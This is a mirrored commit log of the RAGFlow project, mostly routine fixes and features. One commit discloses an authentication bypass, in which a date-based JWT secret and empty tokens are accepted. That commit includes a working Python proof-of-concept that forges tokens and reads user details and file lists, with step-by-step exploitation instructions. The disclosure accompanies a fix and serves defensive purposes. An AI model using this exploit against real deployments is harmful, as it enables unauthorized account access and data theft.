ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2025-12-19 19:19:12 +00:00

Author	SHA1	Message	Date
Jin Hai	4a2ff633e0	Fix typo in code (#8327 ) ### What problem does this PR solve? Fix typo in code ### Type of change - [x] Refactoring --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-06-18 09:41:09 +08:00
Liu An	0a13d79b94	Refa: Implement centralized file name length limit using FILE_NAME_LEN_LIMIT constant (#8318 ) ### What problem does this PR solve? - Replace hardcoded 255-byte file name length checks with FILE_NAME_LEN_LIMIT constant - Update error messages to show the actual limit value - #8290 ### Type of change - [x] Refactoring Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-17 18:01:30 +08:00
Yongteng Lei	0fa1a1469e	Fix: avoid mixing different embedding models in document parsing (#8260 ) ### What problem does this PR solve? Fix mixing different embedding models in document parsing. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-16 13:40:12 +08:00
Kevin Hu	f7074037ef	Feat: Let number of task ahead be visible. (#8259 ) ### What problem does this PR solve? ![image](https://github.com/user-attachments/assets/d4ef0526-343a-426f-a85a-b05eb8b559a1) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-13 17:32:40 +08:00
Yongteng Lei	b2eed8fed1	Fix: incorrect progress updating (#8253 ) ### What problem does this PR solve? Progress is only updated if it's valid and not regressive. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-13 17:24:14 +08:00
Stephen Hu	1ab0f52832	Fix：The OpenAI-Compatible Agent API returns an incorrect message (#8177 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8175 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 19:17:15 +08:00
Stephen Hu	6953ae89c4	Fix:when stream=false，new message without sessionid does no (#8078 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8070 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 15:14:15 +08:00
Kevin Hu	91804f28f1	Fix: issue for tavily only in a assistant. (#8076 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 13:00:43 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 ) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis Source (User Input): HTTP Authorization header containing attacker-controlled JWT token Flow Path: 1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142) 2. Token Processing: JWT token extracted from Authorization header 3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. Database Query: `UserService.query()` called with decoded empty access_token 5. Sink: Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` Exploitation Steps: 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials Version: 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
天海蒼灆	9938a4cbb6	Feat: Allow update conversation parameters and persist to database in completion (#8039 ) ### What problem does this PR solve? This PR updates the completion function to allow parameter updates when a session_id exists. It also ensures changes are saved back to the database via API4ConversationService. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 14:39:04 +08:00
Jin Hai	31f4d44c73	Update upload filename length limit from 128 to 256, which is aligned with os (#7971 ) ### What problem does this PR solve? Change filename length limit from 128 to 256 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-05-30 14:25:59 +08:00
Qidi Cao	f0879563d0	fix: resolve residual image files issue after document deletion (#7964 ) ### What problem does this PR solve? When deleting knowledge base documents in RAGFlow, the current process only removes the block texts in Elasticsearch and the original files in MinIO, but it leaves behind many binary images and thumbnails generated during chunking. This pull request improves the deletion process by querying the block information in Elasticsearch to ensure a more thorough and complete cleanup. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:56:33 +08:00
Stephen Hu	a31ad7f960	Fix: File selection in Retrieval testing causes other options to disappear (#7759 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7753 The internal is due to when the selected row keys change will trigger a testing, but I do not know why. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 09:38:50 +08:00
Yongteng Lei	0c562f0a9f	Refa: change citation mark as [ID:n] (#7923 ) ### What problem does this PR solve? Change citation mark as [ID:n], it's easier for LLMs to follow the instruction :) #7904 ### Type of change - [x] Refactoring	2025-05-29 10:03:51 +08:00
sinopec	243ed4bc35	Feat: Surpport dynamically add knowledge basees for retrieval while u… (#7915 ) …sing the SDK chat API ### What problem does this PR solve? When using the SDK for chat, you can include the IDs of additional knowledge bases you want to use in the request. This way, you don’t need to repeatedly create new assistants to support various combinations of knowledge bases. This is especially useful when there are many knowledge bases with different content. If users clearly know which knowledge base contains the information they need and select accordingly, the recall accuracy will be greatly improved. Users only need to add an extra field, a kb_ids array, in the HTTP request. The content of this field can be determined by the client fetching the list of knowledge bases and letting the user select from it. ### Type of change - [x] New Feature (non-breaking change which adds functionality) Co-authored-by: Li Ye <liye@unittec.com>	2025-05-28 19:16:16 +08:00
liu an	ff0e82988f	Fix: patch regex vulnerability in filename handling (#7887 ) ### What problem does this PR solve? [Regular Expression Injection leading to Denial of Service (ReDoS)](https://github.com/infiniflow/ragflow/security/advisories/GHSA-wqq6-x8g9-f7mh) ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-27 16:35:37 +08:00
Yongteng Lei	453287b06b	Feat: more robust fallbacks for citations (#7801 ) ### What problem does this PR solve? Add more robust fallbacks for citations ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [x] New Feature (non-breaking change which adds functionality)	2025-05-23 18:24:55 +08:00
Yongteng Lei	42f4d4dbc8	Fix: wrong type hint (#7738 ) ### What problem does this PR solve? Wrong hint type. #7729. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-23 18:21:06 +08:00
Yongteng Lei	e8e2a95165	Refa: more fallbacks for bad citation format (#7710 ) ### What problem does this PR solve? More fallbacks for bad citation format ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [x] Refactoring	2025-05-19 19:34:05 +08:00
Yongteng Lei	0ebf05440e	Feat: repair corrupted PDF files on upload automatically (#7693 ) ### What problem does this PR solve? Try the best to repair corrupted PDF files on upload automatically. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-19 14:54:06 +08:00
Song Fuchang	a1f06a4fdc	Feat: Support tool calling in Generate component (#7572 ) ### What problem does this PR solve? Hello, our use case requires LLM agent to invoke some tools, so I made a simple implementation here. This PR does two things: 1. A simple plugin mechanism based on `pluginlib`: This mechanism lives in the `plugin` directory. It will only load plugins from `plugin/embedded_plugins` for now. A sample plugin `bad_calculator.py` is placed in `plugin/embedded_plugins/llm_tools`, it accepts two numbers `a` and `b`, then give a wrong result `a + b + 100`. In the future, it can load plugins from external location with little code change. Plugins are divided into different types. The only plugin type supported in this PR is `llm_tools`, which must implement the `LLMToolPlugin` class in the `plugin/llm_tool_plugin.py`. More plugin types can be added in the future. 2. A tool selector in the `Generate` component: Added a tool selector to select one or more tools for LLM: ![image](https://github.com/user-attachments/assets/74a21fdf-9333-4175-991b-43df6524c5dc) And with the `bad_calculator` tool, it results this with the `qwen-max` model: ![image](https://github.com/user-attachments/assets/93aff9c4-8550-414a-90a2-1a15a5249d94) ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue) - [x] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe): Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>	2025-05-16 16:32:19 +08:00
Stephen Hu	2fa8e3309f	Fix: file name length limit mismtach (#7630 ) ### What problem does this PR solve? Close #7597 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-14 10:13:03 +08:00
liu an	6bd7d572ec	Perf: Increase database connection pool size (#7559 ) ### What problem does this PR solve? 1. The MySQL instance is configured with max_connections=1000, but our connection pool was limited to max_connections: 100. This mismatch caused connection pool exhaustion during performance testing. 2. Increase stale_timeout to resolve #6548 ### Type of change - [x] Performance Improvement	2025-05-09 17:52:03 +08:00
Kevin Hu	2ccec93d71	Feat: support cross-lang search. (#7557 ) ### What problem does this PR solve? #7376 #4503 #5710 #7470 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-09 15:32:02 +08:00
Yongteng Lei	b781207752	Feat: KB detail supports document total size (#7546 ) ### What problem does this PR solve? Kb detail supports return document total size now. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-09 11:48:54 +08:00
Kevin Hu	9849230a04	Fix: remove deprecated novitaAI. (#7511 ) ### What problem does this PR solve? #7484 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-07 19:36:16 +08:00
Stephen Hu	27ffc0ed74	Feat: Improve 'user_canvan_version' delete and 'document' delete performance (#6553 ) ### What problem does this PR solve? 1. Add delete_by_ids method 2. Add get_doc_ids_by_doc_names 3. Improve user_canvan_version's logic (avoid O(n) db IO) 4. Improve document delete logic (avoid O(n) db IO) ### Type of change - [x] Performance Improvement	2025-05-07 10:55:08 +08:00
Kevin Hu	75b24ba02a	Fix: chat solo issue. (#7479 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-06 19:30:00 +08:00
Yongteng Lei	f29a5de9f5	Fix: filed_map was incorrectly persisted (#7443 ) ### What problem does this PR solve? Fix `filed_map` was incorrectly persisted. #7412 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-06 09:44:38 +08:00
Stephen Hu	2dbcc0a1bf	Fix: Tried to fix the fid mis match under some cases (#7426 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7407 Based on this context, I think there should be some reasons that let some LLMs have a mismatch (add the wrong "@xxx"), So I think when use fid can not fetch llm then tried to just use name should can fetch it. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-04-30 14:55:21 +08:00
alkscr	ab27609a64	Fix: whole knowledge graph lost after removing any document in the knowledge base (#7151 ) ### What problem does this PR solve? When you removed any document in a knowledge base using knowledge graph, the graph's `removed_kwd` is set to "Y". However, in the function `graphrag.utils.get_gaph`, `rebuild_graph` method is passed and directly return `None` while `removed_kwd=Y`, making residual part of the graph abandoned (but old entity data still exist in db). Besides, infinity instance actually pass deleting graph components' `source_id` when removing document. It may cause wrong graph after rebuild. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-04-30 09:43:17 +08:00
Yongteng Lei	a4be6c50cf	[BREAKING CHANGE] GET to POST: enhance document list capability (#7349 ) ### What problem does this PR solve? Enhance capability of `list_docs`. Breaking change: change method from `GET` to `POST`. ### Type of change - [x] Refactoring - [x] Enhancement with breaking change	2025-04-27 16:48:27 +08:00
alulala	eead838353	Fix pymysql interface error (#7295 ) ### What problem does this PR solve? According to the [[Rucongzhang](https://github.com/Rucongzhang)](https://github.com/infiniflow/ragflow/pull/7057#issuecomment-2827410047) I added DB reconnection strategy in function `update_by_id`	2025-04-25 13:29:47 +08:00
WhiteBear	2c62652ea8	<think> tag is missing. (#7256 ) ### What problem does this PR solve? Some models force thinking, resulting in the absence of the think tag in the returned content ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-04-24 11:44:10 +08:00
Yongteng Lei	f35ff65c36	[BREAKING CHANGE] GET to POST: enhance kb list capability (#7205 ) ### What problem does this PR solve? Enhance capability of `list_kbs`. Breaking change: change method from `GET` to `POST`. ### Type of change - [x] Refactoring - [x] Enhancement with breaking change	2025-04-22 17:54:12 +08:00
alulala	5d253e0a34	Fix: pymysql.err.InterfaceError: (0, '') during long time streaming chat responses (#6548 ) (#7057 ) ### Related Issue: https://github.com/infiniflow/ragflow/issues/6548 ### Related PR: https://github.com/infiniflow/ragflow/pull/6861 ### Environment: Commit version: [[48730e0](`48730e00a8`)] ### Bug Description: Unexpected `pymysql.err.InterfaceError: (0, '') `when using Peewee + PyMySQL + PooledMySQLDatabase after a long-running `chat streamly` operation. This is a common issue with Peewee + PyMySQL + connection pooling: you end up using a connection that was silently closed by the server, but Peewee doesn't realize it's dead. I found that the error only occurs during longer streaming outputs and is unrelated to the database connection context, so it's likely because: - The prolonged streaming response caused the database connection to time out - The original database connection might have been disconnected by the server during the streaming process ### Why This Happens This error happens even when using `@DB.connection_context() `after the stream is done. After investigation, I found this is caused by MySQL connection pools that appear to be open but are actually dead (expired due to` wait_timeout`). 1. `@DB.connection_context()` (as a decorator or context manager) pulls a connection from the pool. 2. If this connection was idle and expired on the MySQL server (e.g., due to `wait_timeout`), but not closed in Python, it will still be considered “open” (`DB.is_closed() == False`). 3. The real error will occur only when I execute a SQL command (such as .`get_or_none()`), and PyMySQL tries to send it to the server via a broken socket. ### Changes Made: 1. I implemented manual connection checks before executing SQL: ``` try: DB.execute_sql("SELECT 1") except Exception: print("Connection dead, reconnecting...") DB.close() DB.connect() ``` 2. Delayed the token count update until after the streaming response is completed to ensure the streaming output isn't interrupted by database operations. ``` total_tokens = 0 for txt in chat_streamly(system, history, gen_conf): if isinstance(txt, int): total_tokens = txt ...... break ...... if total_tokens > 0: if not TenantLLMService.increase_usage(self.tenant_id, self.llm_type, txt, self.llm_name): logging.error("LLMBundle.chat_streamly can't update token usage for {}/CHAT llm_name: {}, content: {}".format(self.tenant_id, self.llm_name, txt)) ```	2025-04-16 19:15:35 +08:00
Kevin Hu	5af2d57086	Refa. (#7022 ) ### What problem does this PR solve? ### Type of change - [x] Refactoring	2025-04-15 10:20:33 +08:00
Yongteng Lei	7a34159737	Fix: add fallback for bad citation output (#7014 ) ### What problem does this PR solve? Add fallback for bad citation output. #6948 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-04-15 09:33:53 +08:00
Yongteng Lei	98670c3755	Fix: KB update_time changed whenever system relaunched (#6959 ) ### What problem does this PR solve? Fix KB update_time changed whenever system relaunched. #6953 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-04-11 20:10:49 +08:00
Yongteng Lei	dc2c74b249	Feat: add primitive support for function calls (#6840 ) ### What problem does this PR solve? This PR introduces primitive support for function calls, enabling the system to handle basic function call capabilities. However, this feature is currently experimental and not yet enabled for general use, as it is only supported by a subset of models, namely, Qwen and OpenAI models. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-04-08 16:09:03 +08:00
caiming100	a20439bf81	fix: add exception handling for get_by_id method (#6861 ) ### What problem does this PR solve? Fixes #6548 Add exception handling to prevent exceptions from propagating back to the web, which may lead to failure in displaying conversation content. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe): Co-authored-by: cm <caiming@sict.ac.cn>	2025-04-08 16:06:57 +08:00
so95	cded812b97	Feat: add OpenAI compatible API for agent (#6329 ) ### What problem does this PR solve? add openai agent _Briefly describe what this PR aims to solve. Include background context that will help reviewers understand the purpose of the PR._ ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue) - [x] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe): --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-04-03 16:51:37 +08:00
Kevin Hu	9ecc78feeb	Refa: copywriting refinement. (#6779 ) ### What problem does this PR solve? Close #6762 ### Type of change - [x] Refactoring	2025-04-03 11:38:02 +08:00
Song Fuchang	d4a3e9a7cc	Fix table migration on non-exist-yet indexed columns. (#6666 ) ### What problem does this PR solve? Fix #6334 Hello, I encountered the same problem in #6334. In the `api/db/db_models.py`, it calls `obj.create_table()` unconditionally in `init_database_tables`, before the `migrate_db()`. Specially for the `permission` field of `user_canvas` table, it has `index=True`, which causes `peewee` to issue a SQL trying to create the index when the field does not exist (the `user_canvas` table already exists), so `psycopg2.errors.UndefinedColumn: column "permission" does not exist` occurred. I've added a judgement in the code, to only call `create_table()` when the table does not exist, delegate the migration process to `migrate_db()`. Then another problem occurs: the `migrate_db()` actually does nothing because it failed on the first migration! The `playhouse` blindly issue DDLs without things like `IF NOT EXISTS`, so it fails... even if the exception is `pass`, the transaction is still rolled back. So I removed the transaction in `migrate_db()` to make it work. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):	2025-03-31 11:27:20 +08:00
Zhichang Yu	65a8cd1772	Fix knowledge_graph_kwd on infinity. Close #6476 and #6624 (#6651 ) ### What problem does this PR solve? Fix knowledge_graph_kwd on infinity. Close #6476 and #6624 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-03-28 22:05:40 +08:00
Kevin Hu	ecc9605a32	Fix: team doc deletion issue. (#6589 ) ### What problem does this PR solve? #6557 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-03-27 13:26:38 +08:00
Yongteng Lei	df3890827d	Refa: change LLM chat output from full to delta (incremental) (#6534 ) ### What problem does this PR solve? Change LLM chat output from full to delta (incremental) ### Type of change - [x] Refactoring	2025-03-26 19:33:14 +08:00
Chenzy	735d9dd949	Feat: add "tools" to llm_factories.json (#6552 ) ### What problem does this PR solve? ### Type of change - [x] New Feature (non-breaking change which adds functionality) --------- Co-authored-by: Chenzy <chenzy901@gmail.com>	2025-03-26 17:31:18 +08:00
Kevin Hu	bf483fdf02	Fix: describe parameter error. (#6519 ) ### What problem does this PR solve? #6228 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-03-26 09:02:48 +08:00
liwenju0	814a210f5d	Fix: failed to acquire lock exception with retry mechanism for postgres and mysql (#6483 ) Added the with_retry decorator in db_models.py to add a retry mechanism for database operations. Applied the retry mechanism to the lock and unlock methods of the PostgresDatabaseLock and MysqlDatabaseLock classes to enhance the reliability of lock operations. ### What problem does this PR solve? resolve failed to acquire lock exception with retry mechanism ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: wenju.li <wenju.li@deepctr.cn>	2025-03-25 15:09:56 +08:00

1 2 3 4 5 ...

381 Commits